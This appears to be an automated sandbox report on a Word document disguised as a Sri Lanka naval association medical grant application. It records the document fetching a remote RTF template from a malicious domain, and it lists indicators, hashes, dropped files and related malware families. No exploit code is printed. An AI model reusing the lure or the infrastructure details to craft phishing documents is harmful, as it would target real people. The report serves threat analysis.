Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Exploitation for Client Execution		Path InterceptionPath Interception1
Masquerading		OS Credential Dumping1
File and Directory Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory2
System Information Discovery		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SLNA_Updated_Medical_Grant_Application(1).docx0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/P0%Avira URL Cloudsafe
https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/Profile.rtf0%Avira URL Cloudsafe
https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/Profile.rtfyX0%Avira URL Cloudsafe
https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
defence-lk.military-bd.org
5.255.125.140
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/Profile.rtftrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/P~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/11d601c6 on defence-lk.military-bd.org.url.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/Profile.rtfyX~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    5.255.125.140
    		defence-lk.military-bd.orgNetherlands
    		60404LITESERVERNLtrue

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1574549
    Start date and time:2024-12-13 12:09:29 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 59s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:8
    Number of new started drivers analysed:1
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:SLNA_Updated_Medical_Grant_Application(1).docx
    Detection:MAL
    Classification:mal80.evad.winDOCX@1/25@9/1
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .docx
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer

    Warnings

    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: SLNA_Updated_Medical_Grant_Application(1).docx

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    LITESERVERNLS50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
    • 5.255.110.9
    https://google.com/amp/s/storage.googleapis.com/49849844877/j0htjd3c57qbxqo95o8y8539efonkjievx55ax9wajxz4bsbs0i-sele6jz88a1rq45sxfmxy9judtbr3v3hrgryrc2p8a.htmlGet hashmaliciousUnknownBrowse
    • 5.255.99.94
    XzCRLowRXn.exeGet hashmaliciousUnknownBrowse
    • 5.255.111.64
    x86.elfGet hashmaliciousUnknownBrowse
    • 5.255.127.202
    shindemips.elfGet hashmaliciousUnknownBrowse
    • 5.255.127.202
    wkshindei686.elfGet hashmaliciousUnknownBrowse
    • 5.255.127.202
    wkshindem68k.elfGet hashmaliciousUnknownBrowse
    • 5.255.127.202
    wkshindearm7.elfGet hashmaliciousMiraiBrowse
    • 5.255.127.202
    shindeVmips.elfGet hashmaliciousUnknownBrowse
    • 5.255.127.202
    HATCH COVER REQ_AW24 New Order Request.exeGet hashmaliciousGuLoaderBrowse
    • 5.255.110.9

    JA3 Fingerprints

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    05af1f5ca1b87cc9cc9b25185115607dCMR ART009.docxGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
    • 5.255.125.140
    Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    510005940.docx.docGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    invoice09850.xlsGet hashmaliciousRemcosBrowse
    • 5.255.125.140
    Invoice A037.xlsGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
    • 5.255.125.140
    NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 5.255.125.140
    Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
    • 5.255.125.140
    7dcce5b76c8b17472d024758970a406bCMR ART009.docxGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
    • 5.255.125.140
    Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
    • 5.255.125.140
    SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    510005940.docx.docGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    Document.xlaGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    xeroxscan.DocxGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    xeroxscan.DocxGet hashmaliciousUnknownBrowse
    • 5.255.125.140
    invoice09850.xlsGet hashmaliciousRemcosBrowse
    • 5.255.125.140

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025652728340135468
    Encrypted:false
    SSDEEP:6:I3DPchx7iQ9vxggLRePBMyJlUB3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPExNyHaBRvYg3J/
    MD5:A738A8739E7D77801FDAE223AB567E6F
    SHA1:F39D557A08A1BD33C15F99AC3D9C96DB5FE6B1D4
    SHA-256:E71E8DD02042A088DDC69AA0C105AE13F6C819CA74B4B3F8082B6B8891CA82B0
    SHA-512:980D951C60137D406400066CAED5F871F85C0828E0B36A4BD605797A8EA778C8EE4B5CBC3C9301E2B5FB280567332586EB56B1B79BCBAA451F82DBE181AACBDA
    Malicious:false
    Reputation:low
    Preview:......M.eFy...z..iT,..O..Y..2..S,...X.F...Fa.q.............................x.;.:9N................<...A..A.jFbt@X......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Profile[1].rtf

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Rich Text Format data, version 1
    Category:dropped
    Size (bytes):8
    Entropy (8bit):3.0
    Encrypted:false
    SSDEEP:3:gOin:qn
    MD5:43D35B5B20F491BE219AB2EAA172EC55
    SHA1:1327F20512762A533C22FE181BE3FCDD29AB76FE
    SHA-256:1955C6914097477D5141F720C9E8FA44B4FE189E854DA298D85090CBC338B35A
    SHA-512:A721F07B2AA9C5D723A4B11575A602E94A7973278E62BCB5B54D4A48B5ADF1BBE3945E5250DD0CCDD8B1B683B864F8C8B98B7C160118ED84846DE085EB1D3666
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:{\rtf1 }

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Profile[1].rtf

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Rich Text Format data, version 1
    Category:dropped
    Size (bytes):8
    Entropy (8bit):3.0
    Encrypted:false
    SSDEEP:3:gOin:qn
    MD5:43D35B5B20F491BE219AB2EAA172EC55
    SHA1:1327F20512762A533C22FE181BE3FCDD29AB76FE
    SHA-256:1955C6914097477D5141F720C9E8FA44B4FE189E854DA298D85090CBC338B35A
    SHA-512:A721F07B2AA9C5D723A4B11575A602E94A7973278E62BCB5B54D4A48B5ADF1BBE3945E5250DD0CCDD8B1B683B864F8C8B98B7C160118ED84846DE085EB1D3666
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:{\rtf1 }

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\141EC1A9.jpg

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):50
    Entropy (8bit):4.46146788019945
    Encrypted:false
    SSDEEP:3:wcek9LRAlxkAMvtEKb:wJcexJC
    MD5:A471D39C02EE8428702B468C843C62E3
    SHA1:91E6F53C4DCE4D7822F120DA20A75113E5A7DCED
    SHA-256:0C9A8CE9516EDB686FAF2BEE4BD9DC3285207031FE5F2F742ACCF4A525518D8E
    SHA-512:806DD530CE299B765554BB6AE827506D63B9D8A24294DF4E827CA8B808894C2B8845009239F80282F522177DE483D95099E74EF797E6F3B15A2B54F92DFFC03B
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:<Default Extension="jpg" ContentType="image/jpg"/>

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\313CC648.rtf

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Rich Text Format data, version 1
    Category:dropped
    Size (bytes):8
    Entropy (8bit):3.0
    Encrypted:false
    SSDEEP:3:gOin:qn
    MD5:43D35B5B20F491BE219AB2EAA172EC55
    SHA1:1327F20512762A533C22FE181BE3FCDD29AB76FE
    SHA-256:1955C6914097477D5141F720C9E8FA44B4FE189E854DA298D85090CBC338B35A
    SHA-512:A721F07B2AA9C5D723A4B11575A602E94A7973278E62BCB5B54D4A48B5ADF1BBE3945E5250DD0CCDD8B1B683B864F8C8B98B7C160118ED84846DE085EB1D3666
    Malicious:false
    Preview:{\rtf1 }

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66A6FD05.rtf

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Rich Text Format data, version 1
    Category:dropped
    Size (bytes):8
    Entropy (8bit):3.0
    Encrypted:false
    SSDEEP:3:gOin:qn
    MD5:43D35B5B20F491BE219AB2EAA172EC55
    SHA1:1327F20512762A533C22FE181BE3FCDD29AB76FE
    SHA-256:1955C6914097477D5141F720C9E8FA44B4FE189E854DA298D85090CBC338B35A
    SHA-512:A721F07B2AA9C5D723A4B11575A602E94A7973278E62BCB5B54D4A48B5ADF1BBE3945E5250DD0CCDD8B1B683B864F8C8B98B7C160118ED84846DE085EB1D3666
    Malicious:false
    Preview:{\rtf1 }

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74C7D742.jpg

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):50
    Entropy (8bit):4.46146788019945
    Encrypted:false
    SSDEEP:3:wcek9LRAlxkAMvtEKb:wJcexJC
    MD5:A471D39C02EE8428702B468C843C62E3
    SHA1:91E6F53C4DCE4D7822F120DA20A75113E5A7DCED
    SHA-256:0C9A8CE9516EDB686FAF2BEE4BD9DC3285207031FE5F2F742ACCF4A525518D8E
    SHA-512:806DD530CE299B765554BB6AE827506D63B9D8A24294DF4E827CA8B808894C2B8845009239F80282F522177DE483D95099E74EF797E6F3B15A2B54F92DFFC03B
    Malicious:false
    Preview:<Default Extension="jpg" ContentType="image/jpg"/>

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1F7FA9F.rtf

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Rich Text Format data, version 1
    Category:dropped
    Size (bytes):8
    Entropy (8bit):3.0
    Encrypted:false
    SSDEEP:3:gOin:qn
    MD5:43D35B5B20F491BE219AB2EAA172EC55
    SHA1:1327F20512762A533C22FE181BE3FCDD29AB76FE
    SHA-256:1955C6914097477D5141F720C9E8FA44B4FE189E854DA298D85090CBC338B35A
    SHA-512:A721F07B2AA9C5D723A4B11575A602E94A7973278E62BCB5B54D4A48B5ADF1BBE3945E5250DD0CCDD8B1B683B864F8C8B98B7C160118ED84846DE085EB1D3666
    Malicious:false
    Preview:{\rtf1 }

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E29618AA.jpg

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):50
    Entropy (8bit):4.46146788019945
    Encrypted:false
    SSDEEP:3:wcek9LRAlxkAMvtEKb:wJcexJC
    MD5:A471D39C02EE8428702B468C843C62E3
    SHA1:91E6F53C4DCE4D7822F120DA20A75113E5A7DCED
    SHA-256:0C9A8CE9516EDB686FAF2BEE4BD9DC3285207031FE5F2F742ACCF4A525518D8E
    SHA-512:806DD530CE299B765554BB6AE827506D63B9D8A24294DF4E827CA8B808894C2B8845009239F80282F522177DE483D95099E74EF797E6F3B15A2B54F92DFFC03B
    Malicious:false
    Preview:<Default Extension="jpg" ContentType="image/jpg"/>

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):1.0702375532243473
    Encrypted:false
    SSDEEP:24:r4gql/SOmaPMvgDMxim1eYaQ5Ov5TzzlVhkvgDMxhvgDMxiZQ:rsBEvgcBaG6Lkvgchvgc/
    MD5:B01873C45A5001CC8362A2A82D621883
    SHA1:B73B16EE89B47F7DE732DCF6F633D6F5A29CE908
    SHA-256:D013493F2B61702F92F48A389CDB16DF34FF1B561BD85EBE617597E520AE3254
    SHA-512:CD2CCC980CBF4EEA001D22186DC10F1CE91135A22118C0AD8848998E166AFB91FAD55A0284960916AD58BB0697A79A5C9F9A96D10A64705011E22234639616D2
    Malicious:false
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6316F4BA-3B9F-4B2D-9F83-93B5CF3E590F}.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):9728
    Entropy (8bit):3.931490614375623
    Encrypted:false
    SSDEEP:96:G/QDGcsU8ehsaMwSBgSVpRIiHPm0NtmF20yTvnqHoM++Fh4LtOWBlMcCnDVEd:PMe2aUwmm0Nt1jqz++Fat/zPCDVEd
    MD5:0AD73F3B0A1A1DB151455317FC1714AA
    SHA1:FA194655B19C2E525A4A9F9FDFAA9A930006224F
    SHA-256:4FEAC5E4EE0E90E2CEAADFE8DADF429CFD72A064B71F3FF152D71FFA88F29356
    SHA-512:89504244B2FAEE60BE7C7FBFD8F80B12D94A8790B8ACB934145DFF169E802C7CABD6EBAC25D93B9906DD2D178807879D604E0A3A2C909F5FAA5F62A0C2BC1956
    Malicious:false
    Preview:..A.P.P.L.I.C.A.T.I.O.N. .F.O.R. .M.E.D.I.C.A.L. .G.R.A.N.T. .B.Y. .S.R.I. .L.A.N.K.A. .N.A.V.A.L. .A.S.S.O.C.I.A.T.I.O.N.....0.1.....A.p.p.l.i.c.a.n.t. .N.a.m.e. .:.-. .& & & & & & & & & & & & & & & & & & & & & & & ....................................................................................................0.2.....R.a.n.k./.R.a.t.e. .a.t. .t.h.e. .t.i.m.e. .o.f. .D.i.s.c.h.a.r.g.e. ./. .R.e.t.i.r.e.d. .f.r.o.m. .S.L.N. .........................................................................................|...~...<...............N...................p...............................................................................................................................................................v...........................................^........$...+.....].+.^...a$.....................^....................d....^....................d......t.^.........K..d....^.K..................d......r.^.......................^.....................r.^.....................\.^.....

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B41141A1-1342-4534-87E0-085337AD5912}.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\mso81FC.tmp

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:GIF image data, version 89a, 15 x 15
    Category:dropped
    Size (bytes):663
    Entropy (8bit):5.949125862393289
    Encrypted:false
    SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
    MD5:ED3C1C40B68BA4F40DB15529D5443DEC
    SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
    SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
    SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
    Malicious:false
    Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

    C:\Users\user\AppData\Local\Temp\{532B537C-92A5-4B9B-B74E-07CEC96C1408}

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025652728340135468
    Encrypted:false
    SSDEEP:6:I3DPchx7iQ9vxggLRePBMyJlUB3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPExNyHaBRvYg3J/
    MD5:A738A8739E7D77801FDAE223AB567E6F
    SHA1:F39D557A08A1BD33C15F99AC3D9C96DB5FE6B1D4
    SHA-256:E71E8DD02042A088DDC69AA0C105AE13F6C819CA74B4B3F8082B6B8891CA82B0
    SHA-512:980D951C60137D406400066CAED5F871F85C0828E0B36A4BD605797A8EA778C8EE4B5CBC3C9301E2B5FB280567332586EB56B1B79BCBAA451F82DBE181AACBDA
    Malicious:false
    Preview:......M.eFy...z..iT,..O..Y..2..S,...X.F...Fa.q.............................x.;.:9N................<...A..A.jFbt@X......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\{DF2849D5-19E0-45C9-B07C-710997F3C10C}

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.025723827784860376
    Encrypted:false
    SSDEEP:6:I3DPcZ0FvxggLRjGxo4Mg/IRXv//4tfnRujlw//+GtluJ/eRuj:I3DPG0pPP4MFvYg3J/
    MD5:F0FD508377E25B78444249CDB8505D2D
    SHA1:FB75C3132468FEBCD7E24B4FF9D4F1B6A0D9D4B4
    SHA-256:2AFD383DC703F33277D10203EFC74D75901340106C673BA5FE5A59EDC62AA90E
    SHA-512:0F4F9AE40A9323B52D685C647339CED1568D73EE42793E9577A96CD1F5CEC4EA9C05675FEA778ED4AF12BF3630FA9CB83A948983234AA3348EB84D488E644C1F
    Malicious:false
    Preview:......M.eFy...z..T....B.]...9..S,...X.F...Fa.q..............................|....J....T.)..........u..q.H..../G.3.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\11d601c6 on defence-lk.military-bd.org.url

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows 95 Internet shortcut text (URL=<https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/>), ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):87
    Entropy (8bit):4.967039725803807
    Encrypted:false
    SSDEEP:3:HRAbABGQYm2fAbuIMCl69KntnUUn9P:HRYFVm4Aa0l69Cnt
    MD5:4F99A9E4BD0C6E6D16C29840AA16BC64
    SHA1:48F695A9145B41B21B796D1EC01F113D9E365052
    SHA-256:5A3495688FE0CA1663B82A8EF4BFA25401564D4AF01A1894F6E181DF0B0EBE03
    SHA-512:704BC6823B507444DA07F5F5EB2B0175C2F3A5B9DD627A94321DBBD13F6536BC470F0D064A455A6AFFF77D0978A5A06CEF5CD7982C61928DA0D70508D65E5A87
    Malicious:true
    Preview:[InternetShortcut]..URL=https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/..

    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Profile.rtf.url

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows 95 Internet shortcut text (URL=<https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/Profile.rtf>), ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):98
    Entropy (8bit):4.953383314008324
    Encrypted:false
    SSDEEP:3:HRAbABGQYm2fAbuIMCl69KntnUUn9aIPDy:HRYFVm4Aa0l69Cn9O
    MD5:F491B75DE719A5E98E7CF278462F462A
    SHA1:C4227FA70EDA0FAE7543E98A2A76794A318B5057
    SHA-256:FCD4C8EBBF068E792A4A5D3111AB77325DA1C4450E8048D477F1116AC18C8D1B
    SHA-512:A8F2D03E7E0490378F46488BC4AD9D518A508A656499916D77B8F0C4DE4FDE1B2C36F9C3BF5EE91E626D267ED12D39C54858AFDED8A65F01CF63F4A03201E3A7
    Malicious:true
    Preview:[InternetShortcut]..URL=https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/Profile.rtf..

    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SLNA_Updated_Medical_Grant_Application(1).LNK

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Fri Dec 13 10:10:25 2024, length=15041, window=hide
    Category:dropped
    Size (bytes):1174
    Entropy (8bit):4.559126807858301
    Encrypted:false
    SSDEEP:24:88jFWP/XT4SYXbk8h4WGwwgJ+eHrEGwwgJ9Dv3q+57u:8V/XTFYXbJfJ+1fJc+9u
    MD5:5C6244DAEAC70242CE9CF2E6EBC81517
    SHA1:AFF3F4AB83CE9362467FFCFACA4FB71F92C1DC96
    SHA-256:4AA89605A234B3D66C883FE22D09F507256D6EB4CA8F4956DFCBF2E9D29960F4
    SHA-512:8777683729750D50DD22E85A12E7F7DFEA15B33E5DE9A84111CAEB0A0C58F120D90693DC3D7F805C806E6F2A3794FD96DD3179D235E5AC2968528BF58F578BC1
    Malicious:false
